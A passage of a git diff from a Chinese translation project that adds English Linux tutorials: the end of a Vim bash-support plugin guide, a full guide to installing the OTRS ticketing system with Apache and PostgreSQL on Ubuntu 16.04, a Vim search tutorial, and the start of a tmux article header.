Script Header](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][6] + +Add Info in Script Header + +Once you have set the correct values, type `:wq` to save and exit the file. Close the Bash test script, open another script to check the new configuration. The file header should now have your personal details similar to that in the screen shot below: + +``` +$ test2.sh +``` +[ + ![Auto Adds Header to Script](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][7] + +Auto Adds Header to Script + +#### Make Bash-support Plug-in Help Accessible + +To do this, type the command below on the Vim command line and press [Enter], it will create a file .vim/doc/tags: + +``` +:helptags $HOME/.vim/doc/ +``` +[ + ![Add Plugin Help in Vi Editor](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][8] + +Add Plugin Help in Vi Editor + +#### How To Insert Comments in Shell Scripts + +To insert a framed comment, type `\cfr` in normal mode: + +[ + ![Add Comments to Scripts](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][9] + +Add Comments to Scripts + +#### How To Insert Statements in a Shell Script + +The following are key mappings for inserting statements (`n` – normal mode, `i` – insert mode): + +1. `\sc` – case in … esac (n, I) +2. `\sei` – elif then (n, I) +3. `\sf` – for in do done (n, i, v) +4. `\sfo` – for ((…)) do done (n, i, v) +5. `\si` – if then fi (n, i, v) +6. `\sie` – if then else fi (n, i, v) +7. `\ss` – select in do done (n, i, v) +8. `\su` – until do done (n, i, v) +9. `\sw` – while do done (n, i, v) +10. `\sfu` – function (n, i, v) +11. `\se` – echo -e “…” (n, i, v) +12. `\sp` – printf “…” (n, i, v) +13. `\sa` – array element, ${.[.]} (n, i, v) and many more array features. + +#### Insert a Function and Function Header + +Type `\sfu` to add a new empty function, then add the function name and press [Enter] to create it. Afterwards, add your function code. + +[ + ![Insert New Function in Script](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][10] + +Insert New Function in Script + +To create a header for the function above, type `\cfu`, enter name of the function, click [Enter] and fill in the appropriate values (name, description, parameters and returns): + +[ + ![Create Header Function in Script](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][11] + +Create Header Function in Script + +#### More Examples of Adding Bash Statements + +Below is an example showing insertion of an if statement using `\si`: + +[ + ![Add Insert Statement to Script](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][12] + +Add Insert Statement to Script + +Next example showing addition of an echo statement using `\se`: + +[ + ![Add echo Statement to Script](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][13] + +Add echo Statement to Script + +#### How To Use Run Operation in Vi Editor + +The following is a list of some run operations key mappings: + +1. `\rr` – update file, run script (n, I) +2. `\ra` – set script cmd line arguments (n, I) +3. `\rc` – update file, check syntax (n, I) +4. `\rco` – syntax check options (n, I) +5. `\rd` – start debugger (n, I) +6. `\re` – make script executable/not exec.(*) (in) + +#### Make Script Executable + +After writing script, save it and type `\re` to make it executable by pressing [Enter]. + +[ + ![Make Script Executable](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][14] + +Make Script Executable + +#### How To Use Predefined Code Snippets To a Bash Script + +Predefined code snippets are files that contain already written code meant for a specific purpose. To add code snippets, type `\nr` and `\nw` to read/write predefined code snippets. Issue the command that follows to list default code snippets: + +``` +$ .vim/bash-support/codesnippets/ +``` +[ + ![List of Code Snippets](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][15] + +List of Code Snippets + +To use a code snippet such as free-software-comment, type `\nr` and use auto-completion feature to select its name, and press [Enter]: + +[ + ![Add Code Snippet to Script](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][16] + +Add Code Snippet to Script + +#### Create Custom Predefined Code Snippets + +It is possible to write your own code snippets under ~/.vim/bash-support/codesnippets/. Importantly, you can also create your own code snippets from normal script code: + +1. choose the section of code that you want to use as a code snippet, then press `\nw`, and closely give it a filename. +2. to read it, type `\nr` and use the filename to add your custom code snippet. + +#### View Help For the Built-in and Command Under the Cursor + +To display help, in normal mode, type: + +1. `\hh` – for built-in help +2. `\hm` – for a command help + +[ + ![View Built-in Command Help](http://www.tecmint.com/wp-content/uploads/2017/02/View-Built-in-Command-Help.png) +][17] + +View Built-in Command Help + +For more reference, read through the file : + +``` +~/.vim/doc/bashsupport.txt #copy of online documentation +~/.vim/doc/tags +``` + +Visit the Bash-support plug-in Github repository: [https://github.com/WolfgangMehner/bash-support][18] +Visit Bash-support plug-in on the Vim Website: [http://www.vim.org/scripts/script.php?script_id=365][19] + +That’s all for now, in this article, we described the steps of installing and configuring Vim as a Bash-IDE in Linux using bash-support plug-in. Check out the other exciting features of this plug-in, and do share them with us in the comments. + +-------------------------------------------------------------------------------- + +作者简介: + +Aaron Kili is a Linux and F.O.S.S enthusiast, an upcoming Linux SysAdmin, web developer, and currently a content creator for TecMint who loves working with computers and strongly believes in sharing knowledge. + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/use-vim-as-bash-ide-using-bash-support-in-linux/ + +作者:[Aaron Kili][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ + +[1]:http://www.tecmint.com/best-linux-ide-editors-source-code-editors/ +[2]:http://www.tecmint.com/vi-editor-usage/ +[3]:http://www.tecmint.com/wp-content/uploads/2017/02/Script-Header-Options.png +[4]:http://www.tecmint.com/wp-content/uploads/2017/02/Set-Personalization-in-Scripts.png +[5]:http://www.tecmint.com/wp-content/uploads/2017/02/Set-Personalization-File-Location.png +[6]:http://www.tecmint.com/wp-content/uploads/2017/02/Add-Info-in-Script-Header.png +[7]:http://www.tecmint.com/wp-content/uploads/2017/02/Auto-Adds-Header-to-Script.png +[8]:http://www.tecmint.com/wp-content/uploads/2017/02/Add-Plugin-Help-in-Vi-Editor.png +[9]:http://www.tecmint.com/wp-content/uploads/2017/02/Add-Comments-to-Scripts.png +[10]:http://www.tecmint.com/wp-content/uploads/2017/02/Insert-New-Function-in-Script.png +[11]:http://www.tecmint.com/wp-content/uploads/2017/02/Create-Header-Function-in-Script.png +[12]:http://www.tecmint.com/wp-content/uploads/2017/02/Add-Insert-Statement-to-Script.png +[13]:http://www.tecmint.com/wp-content/uploads/2017/02/Add-echo-Statement-to-Script.png +[14]:http://www.tecmint.com/wp-content/uploads/2017/02/make-script-executable.png +[15]:http://www.tecmint.com/wp-content/uploads/2017/02/list-of-code-snippets.png +[16]:http://www.tecmint.com/wp-content/uploads/2017/02/Add-Code-Snippet-to-Script.png +[17]:http://www.tecmint.com/wp-content/uploads/2017/02/View-Built-in-Command-Help.png +[18]:https://github.com/WolfgangMehner/bash-support +[19]:http://www.vim.org/scripts/script.php?script_id=365 diff --git a/sources/tech/20170210 How to install OTRS on Ubuntu 16.04.md b/sources/tech/20170210 How to install OTRS on Ubuntu 16.04.md new file mode 100644 index 0000000000..a51fb58308 --- /dev/null +++ b/sources/tech/20170210 How to install OTRS on Ubuntu 16.04.md @@ -0,0 +1,475 @@ +How to install OTRS (OpenSource Trouble Ticket System) on Ubuntu 16.04 +============================================================ + +### On this page + +1. [Step 1 - Install Apache and PostgreSQL][1] +2. [Step 2 - Install Perl Modules][2] +3. [Step 3 - Create New User for OTRS][3] +4. [Step 4 - Create and Configure the Database][4] +5. [Step 5 - Download and Configure OTRS][5] +6. [Step 6 - Import the Sample Database][6] +7. [Step 7 - Start OTRS][7] +8. [Step 8 - Configure OTRS Cronjob][8] +9. [Step 9 - Testing OTRS][9] +10. [Step 10 - Troubleshooting][10] +11. [Reference][11] + +OTRS or Open-source Ticket Request System is an open source ticketing software used for Customer Service, Help Desk, and IT Service Management. The software is written in Perl and javascript. It is a ticketing solution for companies and organizations that have to manage tickets, complaints, support request or other kinds of reports. OTRS supports several database systems including MySQL, PostgreSQL, Oracle and SQL Server it is a multiplatform software that can be installed on Windows and Linux. + +In this tutorial, I will show you how to install and configure OTRS on Ubuntu 16.04\. I will use PostgreSQL as the database for OTRS, and Apache web server as the web server. + +**Prerequisites** + +* Ubuntu 16.04. +* Min 2GB of Memory. +* Root privileges. + +### Step 1 - Install Apache and PostgreSQL + +In this first step, we will install the Apache web server and PostgreSQL. We will use the latest versions from the ubuntu repository. + +Login to your Ubuntu server with SSH: + +`ssh root@192.168.33.14` + +Update Ubuntu repository. + +`sudo apt-get update` + +Install Apache2 and a PostgreSQL with the apt: + +`sudo apt-get install -y apache2 libapache2-mod-perl2 postgresql` + +Then make sure that Apache and PostgreSQL are running by checking the server port. + +`netstat -plntu` + +[ + ![Install Apache and PostgreSQL](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/1.png) +][17] + +You will see port 80 is used by apache, and port 5432 used by postgresql database. + +### Step 2 - Install Perl Modules + +OTRS is based on Perl, so we need to install some Perl modules that are required by OTRS. + +Install perl modules for OTRS with this apt command: + +``` +sudo apt-get install -y libapache2-mod-perl2 libdbd-pg-perl libnet-dns-perl libnet-ldap-perl libio-socket-ssl-perl libpdf-api2-perl libsoap-lite-perl libgd-text-perl libgd-graph-perl libapache-dbi-perl libarchive-zip-perl libcrypt-eksblowfish-perl libcrypt-ssleay-perl libencode-hanextra-perl libjson-xs-perl libmail-imapclient-perl libtemplate-perl libtemplate-perl libtext-csv-xs-perl libxml-libxml-perl libxml-libxslt-perl libpdf-api2-simple-perl libyaml-libyaml-perl +``` + +When the installation is finished, we need to activate the Perl module for apache, then restart the apache service. + +``` +a2enmod perl +systemctl restart apache2 +``` + +Next, check the apache module is loaded with the command below: + +`apachectl -M | sort` + +[ + ![Enable Apache Perl Module](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/2.png) +][18] + +And you will see **perl_module** under 'Loaded Modules' section. + +### Step 3 - Create New User for OTRS + +OTRS is a web based application and running under the apache web server. For best security, we need to run it under a normal user, not the root user. + +Create a new user named 'otrs' with the useradd command below: + +``` +useradd -r -d /opt/otrs -c 'OTRS User' otrs + +**-r**: make the user as a system account. +**-d /opt/otrs**: define home directory for new user on '/opt/otrs'. +**-c**: comment. +``` + +Next, add the otrs user to 'www-data' group, because apache is running under 'www-data' user and group. + +`usermod -a -G www-data otrs` + +Check that the otrs user is available in the '/etc/passwd' file. + +``` +grep -rin otrs /etc/passwd +``` + +[ + ![Create new user for OTRS](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/3.png) +][19] + +New user for OTRS is created. + +### Step 4 - Create and Configure the Database + +In this section, we will create a new PostgreSQL database for the OTRS system and make some small changes in PostgreSQL database configuration. + +Login to the **postgres** user and access the PostgreSQL shell. + +``` +su - postgres +psql +``` + +Create a new role named '**otrs**' with the password '**myotrspw**' and the nosuperuser option. + +create user otrs password 'myotrspw' nosuperuser; + +Then create a new database named '**otrs**' under the '**otrs**' user privileges: + +``` +create database otrs owner otrs; +\q +``` + +Next, edit the PostgreSQL configuration file for otrs role authentication. + +``` +vim /etc/postgresql/9.5/main/pg_hba.conf +``` + +Paste the cConfiguration below after line 84: + +``` +local   otrs            otrs                                    password +host    otrs            otrs            127.0.0.1/32            password +``` + +Save the file and exit vim. + +[ + ![Database Authentication OTRS](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/4.png) +][20] + +Back to the root privileges with "exit" and restart PostgreSQL: + +``` +exit +systemctl restart postgresql +``` + +PostgreSQL is ready for the OTRS installation. + +[ + ![Configure PostgreSQL for OTRS](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/5.png) +][21] + +### Step 5 - Download and Configure OTRS + +In this tutorial, we will use the latest OTRS version that is available on the OTRS web site. + +Go to the '/opt' directory and download OTRS 5.0 with the wget command: + +``` +cd /opt/ +wget http://ftp.otrs.org/pub/otrs/otrs-5.0.16.tar.gz +``` + +Extract the otrs file, rename the directory and change owner of all otrs files and directories the 'otrs' user. + +``` +tar -xzvf otrs-5.0.16.tar.gz +mv otrs-5.0.16 otrs +chown -R otrs:otrs otrs +``` + +Next, we need to check the system and make sure it's ready for OTRS installation. + +Check system packages for OTRS installation with the otrs script command below: + +``` +/opt/otrs/bin/otrs.CheckModules.pl +``` + +Make sure all results are ok, it means is our server ready for OTRS. + +[ + ![OTRS Chek Module needed for Installation](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/6.png) +][22] + +OTRS is downloaded, and our server is ready for the OTRS installation. + +Next, go to the otrs directory and copy the configuration file. + +``` +cd /opt/otrs/ +cp Kernel/Config.pm.dist Kernel/Config.pm +``` + +Edit 'Config.pm' file with vim: + +``` +vim Kernel/Config.pm +``` + +Change the database password line 42: + +``` +$Self->{DatabasePw} = 'myotrspw'; +``` + +Comment the MySQL database support line 45: + +# $Self->{DatabaseDSN} = "DBI:mysql:database=$Self->{Database};host=$Self->{DatabaseHost};"; + +Uncomment PostgreSQL database support line 49: + +``` +$Self->{DatabaseDSN} = "DBI:Pg:dbname=$Self->{Database};"; +``` + +Save the file and exit vim. + +Then edit apache startup file to enable PostgreSQL support. + +``` +vim scripts/apache2-perl-startup.pl +``` + +Uncomment line 60 and 61: + +``` +# enable this if you use postgresql +use DBD::Pg (); +use Kernel::System::DB::postgresql; +``` + +Save the file and exit the editor. + +Finally, check for any missing dependency and modules. + +``` +perl -cw /opt/otrs/bin/cgi-bin/index.pl +perl -cw /opt/otrs/bin/cgi-bin/customer.pl +perl -cw /opt/otrs/bin/otrs.Console.pl +``` + +You should see that the result is '**OK**' asshown in the screenshot below: + +[ + ![Check all modules again](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/7.png) +][23] + +### Step 6 - Import the Sample Database + +In this tutorial, we will use the sample database, it's available in the script directory. So we just need to import all sample databases and the schemes to the existing database created in step 4. + +Login to the postgres user and go to the otrs directory. + +``` +su - postgres +cd /opt/otrs/ +``` +Insert database and table scheme with psql command as otrs user. + +``` +psql -U otrs -W -f scripts/database/otrs-schema.postgresql.sql otrs +psql -U otrs -W -f scripts/database/otrs-initial_insert.postgresql.sql otrs +psql -U otrs -W -f scripts/database/otrs-schema-post.postgresql.sql otrs +``` + +Type the database password '**myotrspw**' when requested. + +[ + ![Import OTRS Sample Database](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/8.png) +][24] + +### Step 7 - Start OTRS + +Database and OTRS are configured, now we can start OTRS. + +Set the permission of otrs file and directory to the www-data user and group. + +``` +/opt/otrs/bin/otrs.SetPermissions.pl --otrs-user=www-data --web-group=www-data +``` + +Then enable the otrs apache configuration by creating a new symbolic link of the file to the apache virtual host directory. + +``` +ln -s /opt/otrs/scripts/apache2-httpd.include.conf /etc/apache2/sites-available/otrs.conf +``` + +Enable otrs virtual host and restart apache. + +``` +a2ensite otrs +systemctl restart apache2 +``` + +Make sure apache has no error. + +[ + ![Enable OTRS Apache Virtual Host](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/9.png) +][25] + +### Step 8 - Configure OTRS Cronjob + +OTRS is installed and now running under apache web server, but we still need to configure the OTRS Cronjob. + +Login to the 'otrs' user, then go to the 'var/cron' directory as the otrs user. + +``` +su - otrs +cd var/cron/ +pwd +``` + +Copy all cronjob .dist scripts with the command below: + +for foo in *.dist; do cp $foo `basename $foo .dist`; done + +Back to the root privilege with exit and then start the cron script as otrs user. + +``` +exit +/opt/otrs/bin/Cron.sh start otrs +``` + +[ + ![Enable OTRS Cron](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/10.png) +][26] + +Next, manually create a new cronjob for PostMaster which fetches the emails. I'll configure it tp fetch emails every 2 minutes. + +``` +su - otrs +crontab -e +``` + +Paste the configuration below: + +``` +*/2 * * * *    $HOME/bin/otrs.PostMasterMailbox.pl >> /dev/null +``` + +Save and exit. + +Now stop otrs daemon and start it again. + +``` +bin/otrs.Daemon.pl stop +bin/otrs.Daemon.pl start +``` + +[ + ![Enable OTRS Fetching Email](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/11.png) +][27] + +The OTRS installation and configuration is finished. + +### Step 9 - Testing OTRS + +Open your web browser and type in your server IP address: + +[http://192.168.33.14/otrs/][28] + +Login with default user '**root@localhost**' and password '**root**'. + +[ + ![Installation Successfully OTRS Home Page](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/12.png) +][29] + +You will see a warning about using default root account. Click on that warning message to create new admin root user. + +Below the admin page after login with different admin root user, and there is no error message again. + +[ + ![OTRS Admin Dashboard Without Error Messages](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/13.png) +][30] + +If you want to log in as Customer, you can use 'customer.pl'. + +[http://192.168.33.14/otrs/customer.pl][31] + +You will see the customer login page. Type in a customer username and password. + +[ + ![OTRS Customer Login Page](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/14.png) +][32] + +Below is the customer page for creating a new ticket. + +[ + ![Customer Open Ticket](https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/15.png) +][33] + +### Step 10 - Troubleshooting + +If you still have an error like 'OTRS Daemon is not running', you can enable debugging in the OTRS daemon like this. +``` + +su - otrs +cd /opt/otrs/ +``` + +Stop OTRS daemon: + +``` +bin/otrs.Daemon.pl stop +``` + +And start OTRS daemon with --debug option. + +``` +bin/otrs.Daemon.pl start --debug +``` + +### Reference + +* [http://wiki.otterhub.org/index.php?title=Installation_on_Debian_6_with_Postgres][12][][13] +* [http://www.geoffstratton.com/otrs-installation-5011-ubuntu-1604][14][][15] +* [https://www.linkedin.com/pulse/ticketing-system-otrs-ubuntu-1404-muhammad-faiz-khan][16] + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/ + +作者:[Muhammad Arul][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/ +[1]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#step-install-apache-and-postgresql +[2]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#step-install-perl-modules +[3]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#step-create-new-user-for-otrs +[4]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#step-create-and-configure-the-database +[5]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#step-download-and-configure-otrs +[6]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#step-import-the-sample-database +[7]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#step-start-otrs +[8]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#step-configure-otrs-cronjob +[9]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#step-testing-otrs +[10]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#step-troubleshooting +[11]:https://www.howtoforge.com/tutorial/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/#reference +[12]:http://wiki.otterhub.org/index.php?title=Installation_on_Debian_6_with_Postgres +[13]:http://wiki.otterhub.org/index.php?title=Installation_on_Debian_6_with_Postgres +[14]:http://www.geoffstratton.com/otrs-installation-5011-ubuntu-1604 +[15]:http://www.geoffstratton.com/otrs-installation-5011-ubuntu-1604 +[16]:https://www.linkedin.com/pulse/ticketing-system-otrs-ubuntu-1404-muhammad-faiz-khan +[17]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/1.png +[18]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/2.png +[19]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/3.png +[20]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/4.png +[21]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/5.png +[22]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/6.png +[23]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/7.png +[24]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/8.png +[25]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/9.png +[26]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/10.png +[27]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/11.png +[28]:http://192.168.33.14/otrs/ +[29]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/12.png +[30]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/13.png +[31]:http://192.168.33.14/otrs/customer.pl +[32]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/14.png +[33]:https://www.howtoforge.com/images/how-to-install-otrs-opensource-trouble-ticket-system-on-ubuntu-16-04/big/15.png diff --git a/sources/tech/20170210 How to perform search operations in Vim.md b/sources/tech/20170210 How to perform search operations in Vim.md new file mode 100644 index 0000000000..4fa38808f8 --- /dev/null +++ b/sources/tech/20170210 How to perform search operations in Vim.md @@ -0,0 +1,161 @@ +How to perform search operations in Vim +============================================================ + +### On this page + +1. [Customize your search][5] + 1. [1\. Search highlighting][1] + 2. [2\. Making search case-insensitive][2] + 3. [3\. Smartcase search][3] + 4. [4\. Incremental search][4] +2. [Some other cool Vim search tips/tricks][6] +3. [Conclusion][7] + +While we've already [covered][8] several features of Vim until now, the editor's feature-set is so vast that no matter how much you learn, it doesn't seem to be enough. So continuing with our Vim tutorial series, in this write-up, we will discuss the various search techniques that the editor offers. + +But before we do that, please note that all the examples, commands, and instructions mentioned in this tutorial have been tested on Ubuntu 14.04, and the Vim version we've used is 7.4. + +### Basic search operations in Vim + +If you have opened a file in the Vim editor, and want to search a particular word or pattern, the first step that you have to do is to come out of the Insert mode (if you that mode is currently active). Once that is done, type '**/**' (without quotes) followed by the word/pattern that you want to search. + +For example, if the word you want to search is 'linux', here's how it will appear at the bottom of your Vim window: + +[ + ![Search for words in vim](https://www.howtoforge.com/images/perform-search-operations-in-vim/vim-basic-search.png) +][9] + +After this, just hit the Enter key and you'll see that Vim will place the cursor on the first line (containing the word) that it encounters beginning from the line where the cursor was when you were in Insert mode. If you've just opened a file and began searching then the search operation will start from the very first line of the file. + +To move on to the next line containing the searched word, press the '**n**' key. When you've traversed through all the lines containing the searched pattern, pressing the '**n**' key again will make the editor to repeat the search, and you'll be back to the first searched occurrence again. + +[ + ![Move to next search hit](https://www.howtoforge.com/images/perform-search-operations-in-vim/vim-search-end.png) +][10] + +While traversing the searched occurrences, if you want to go back to the previous occurrence, press '**N**' (shift+n). Also, it's worth mentioning that at any point in time, you can type '**ggn**' to jump to the first match, or '**GN**' to jump to the last. + +In case you are at the bottom of a file, and want to search backwards, then instead of initiating the search with **/**, use **?**. Here's an example: + +[ + ![search backwards](https://www.howtoforge.com/images/perform-search-operations-in-vim/vim-search-back.png) +][11] + +### Customize your search + +### 1\. Search highlighting + +While jumping from one occurrence of the searched word/pattern to another is easy using 'n' or 'N,' things become more user-friendly if the searched occurrences get highlighted. For example, see the screenshot below: + +[ + ![Search Highlighting in VIM](https://www.howtoforge.com/images/perform-search-operations-in-vim/vim-highlight-search.png) +][12] + +This can be made possible by setting the 'hlsearch' variable, something which you can do by writing the following in the normal/command mode: + +``` +:set hlsearch +``` + +[ + ![set hlsearch](https://www.howtoforge.com/images/perform-search-operations-in-vim/vim-set-hlsearch.png) +][13] + +### 2\. Making search case-insensitive + +By default, the search you do in Vim is case-sensitive. This means that if I am searching for 'linux', then 'Linux' won't get matched. However, if that's not what you are looking for, then you can make the search case-insensitive using the following command: + +``` +:set ignorecase +``` + +So after I set the 'ignorecase' variable using the aforementioned command, and searched for 'linux', the occurrences of 'LINUX' were also highlighted: + +[ + ![search case-insensitive](https://www.howtoforge.com/images/perform-search-operations-in-vim/vim-search-case.png) +][14] + +### 3\. Smartcase search + +Vim also offers you a feature using which you can ask the editor to be case-sensitive only when the searched word/pattern contains an uppercase character. For this you need to first set the 'ignorecase' variable and then set the 'smartcase' variable. + +``` +:set ignorecase +:set smartcase +``` + +For example, if a file contains both 'LINUX' and 'linux,' and smartcase is on, then only occurrences of the word LINUX will be searched if you search using '/LINUX'. However, if the search is '/linux', then all the occurrences will get matched irrespective of whether they are in caps or not. + +### 4\. Incremental search + +Just like, for example, Google, which shows search results as you type your query (updating them with each alphabet you type), Vim also provides incremental search. To access the feature, you'll have to execute the following command before you start searching: + +``` +:set incsearch +``` + +### Some other cool Vim search tips/tricks + +There are several other search-related tips tricks that you may find useful. + +To start off, if you want to search for a word that's there in the file, but you don't want to type it, you can just bring your cursor below it and press ***** (or **shift+8**). And if you want to launch a partial search (for example: search both 'in' and 'terminal'), then you can bring the cursor under the word (in our example, in) and search by pressing **g*** (press 'g' once and then keep pressing *) on the keyboard. + +Note: Press **#** or **g#** in case you want to search backwards. + +Next up, if you want, you can get a list of all occurrences of the searched word/pattern along with the respective lines and line numbers at one place. This can be done by type **[I** after you've initiated the search. Following is an example of how the results are grouped and displayed at the bottom of Vim window: + +[ + ![grouped search results](https://www.howtoforge.com/images/perform-search-operations-in-vim/vim-results-list.png) +][15] + +Moving on, as you might already know, the Vim search wraps by default, meaning after reaching the end of the file (or to the last occurrence of the searched word), pressing "search next" brings the cursor to the first occurrence again. If you want, you can disable this search wrapping by running the following command: + +``` +:set nowrapscan +``` + +To enable wrap scan again, use the following command: + +``` +:set wrapscan +``` + +Finally, suppose you want to make a slight change to an already existing word in the file, and then perform the search operation, then one way is to type **/** followed by that word. But if the word in long or complicated, then it may take time to type it. + +An easy way out is to bring the cursor under the word you want to slightly edit, then press '/' and then press Ctrl-r followed by Ctrl-w. The word under the cursor will not only get copied, it will be pasted after '/' as well, allowing you to easily edit it and go ahead with the search operation. + +For more tricks (including how you can use your mouse to make things easier in Vim), head to the [official Vim documentation][16]. + +### Conclusion + +Of course, nobody expects you to mug up all the tips/tricks mentioned here. What you can do is, start with the one you think will be the most beneficial to you, and practice it regularly. Once it gets embedded in your memory and becomes a habit, come here again, and see which one you should learn next. + +Do you know any more such tricks? Want to share it with everyone in the HTF community? Then leave it as a comment below. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/perform-search-operations-in-vim/ + +作者:[Himanshu Arora][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/perform-search-operations-in-vim/ +[1]:https://www.howtoforge.com/tutorial/perform-search-operations-in-vim/#-search-highlighting +[2]:https://www.howtoforge.com/tutorial/perform-search-operations-in-vim/#-making-searchnbspcaseinsensitive +[3]:https://www.howtoforge.com/tutorial/perform-search-operations-in-vim/#-smartcase-search +[4]:https://www.howtoforge.com/tutorial/perform-search-operations-in-vim/#-incremental-search +[5]:https://www.howtoforge.com/tutorial/perform-search-operations-in-vim/#customize-your-search +[6]:https://www.howtoforge.com/tutorial/perform-search-operations-in-vim/#some-other-cool-vim-search-tipstricks +[7]:https://www.howtoforge.com/tutorial/perform-search-operations-in-vim/#conclusion +[8]:https://www.howtoforge.com/tutorial/vim-editor-modes-explained/ +[9]:https://www.howtoforge.com/images/perform-search-operations-in-vim/big/vim-basic-search.png +[10]:https://www.howtoforge.com/images/perform-search-operations-in-vim/big/vim-search-end.png +[11]:https://www.howtoforge.com/images/perform-search-operations-in-vim/big/vim-search-back.png +[12]:https://www.howtoforge.com/images/perform-search-operations-in-vim/big/vim-highlight-search.png +[13]:https://www.howtoforge.com/images/perform-search-operations-in-vim/big/vim-set-hlsearch.png +[14]:https://www.howtoforge.com/images/perform-search-operations-in-vim/big/vim-search-case.png +[15]:https://www.howtoforge.com/images/perform-search-operations-in-vim/big/vim-results-list.png +[16]:http://vim.wikia.com/wiki/Searching diff --git a/sources/tech/20170210 Use tmux for a more powerful terminal.md b/sources/tech/20170210 Use tmux for a more powerful terminal.md new file mode 100644 index 0000000000..4d14a82ed3 --- /dev/null +++ b/sources/tech/20170210 Use tmux for a more powerful terminal.md 